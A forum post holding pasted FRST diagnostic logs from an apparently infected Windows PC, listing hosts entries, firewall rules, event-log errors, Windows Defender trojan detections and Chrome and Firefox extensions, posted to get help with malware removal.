2019-02-14 02:43 - 2019-02-08 19:51 - 002400096 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node
2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2018-04-12 18:06 - 2019-02-08 19:51 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2019-02-14 02:42 - 2019-02-08 19:51 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node
2019-02-14 02:42 - 2019-02-08 19:51 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node
2019-02-14 02:42 - 2019-02-08 19:52 - 003257192 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\38318503.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TenorshareWinAdService => 2
MSCONFIG\Services: WsAppService => 2
MSCONFIG\startupreg: utweb => "C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "utweb"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "IncrediMail"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{27AB2084-96CC-423D-8AE7-D0AC93666081}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{3AF93F33-8A51-4215-BC5E-F4DB7A8EEE52}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{50B50355-5350-4725-BD33-5A7C6482C01A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E18A37C3-3221-4F6B-9241-67BE79FCF0DC}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07B5D44D-4E10-43B2-9078-1C393459622F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{667D3D91-E5EA-4EA3-9A3C-5C2F77E71A0D}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File
FirewallRules: [{0CF852DE-F4B5-441D-95F8-130531A3076F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{0513F420-E8DE-4C74-BAF0-F3CFF66CE5C6}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File
FirewallRules: [{6DDFF7C5-16FF-49FF-95F9-472442614287}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{255BD4B5-55AB-4A04-AF01-2ECA95F1F335}] => (Allow) C:\Program Files\Opera\58.0.3135.65\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [TCP Query User{DD2AF73D-267B-418A-A0F5-05DD5ED97831}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{A7B50CA7-7E26-4E38-BC39-4332936FB3E2}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)

==================== Restore Points =========================

30-01-2019 08:42:13 Scheduled Checkpoint
07-02-2019 07:32:46 Scheduled Checkpoint
14-02-2019 03:01:16 Removed IncrediMail.
14-02-2019 23:59:09 Restore Point Created by FRST
16-02-2019 07:50:46 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/17/2019 12:43:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 13.2.2019.1 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1cb8

Start Time: 01d4c6b5f947de37

Termination Time: 30

Application Path: C:\Users\Stanley\Downloads\FRST\FRST64.exe

Report Id: 3b0a8a57-32a9-11e9-8280-402cf4d8539a

Faulting package full name: 

Faulting package-relative application ID:

Error: (02/17/2019 09:05:42 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 09:05:37 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 09:05:05 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/17/2019 01:04:23 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/16/2019 09:48:51 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/16/2019 08:55:56 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/16/2019 08:36:40 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable


System errors:
=============
Error: (02/16/2019 09:01:30 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 09:00:39 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 09:00:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 08:33:34 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 08:32:43 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.

Error: (02/16/2019 08:32:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The UC Browser Service service failed to start due to the following error: 
The system cannot find the file specified.

Error: (02/16/2019 07:38:07 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/16/2019 07:37:13 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The OpenVPN Legacy Service service terminated with the following error: 
The process cannot access the file because it is being used by another process.


Windows Defender:
===================================
Date: 2019-02-15 01:30:44.644
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {33A0CEFD-234D-475F-8ADE-5D3D11D9E85A}
Scan Type: Antimalware
Scan Parameters: Full Scan

Date: 2019-02-14 03:37:29.427
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {37ABE826-5D4C-4627-8D24-955304B7A07C}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Name: Trojan:Win32/Fuerboos.C!cl
ID: 2147723654
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\Dingbam.tst
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bitrep.A&threatid=2147723097&enterprise=0
Name: Trojan:Win32/Bitrep.A
ID: 2147723097
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\AppData\Local\IM\Identities\{A156883C-4811-474F-ACCE-796599B8B822}\Message Store\Messages\4\{E94F6B5A-2129-4595-A27B-FBAABD7D5EE2}\Attachments\Order_009.pdf
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 23:30:12.489
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:Win32/Prepscram&threatid=226289&enterprise=0
Name: SoftwareBundler:Win32/Prepscram
ID: 226289
Severity: High
Category: Software Bundler
Path: containerfile:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt;file:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt->setup.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: User
Process Name: Unknown
Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0

Date: 2019-02-13 16:10:19.791
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 16:02:00.333
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80072ee2
Error description: The operation timed out 

Date: 2019-02-13 15:59:52.285
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.269.584.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.14901.4
Error code: 0x80070424
Error description: The specified service does not exist as an installed service. 

Date: 2018-05-29 09:02:21.940
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:5952,ProcessStart:131720254146746317
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

CodeIntegrity:
===================================

Date: 2018-12-23 07:19:51.102
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:49.365
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:47.582
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2018-12-23 07:19:45.686
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 47%
Total physical RAM: 4006.35 MB
Available physical RAM: 2102.2 MB
Total Virtual: 7974.35 MB
Available Virtual: 5486.83 MB

==================== Drives ================================

Drive 😄 () (Fixed) (Total:297.75 GB) (Free:65.57 GB) NTFS

\\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Link to post
Share on other sites

                                   NEW   FRST.TXT

 

 

 

 


FireFox:
========
FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-15]
FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-16] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: Profile 3
CHR Session Restore: Profile 3 -> is enabled.
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-15]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-15]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-15]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-15]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-15]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-15]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-15]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-15]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-17]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-18]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
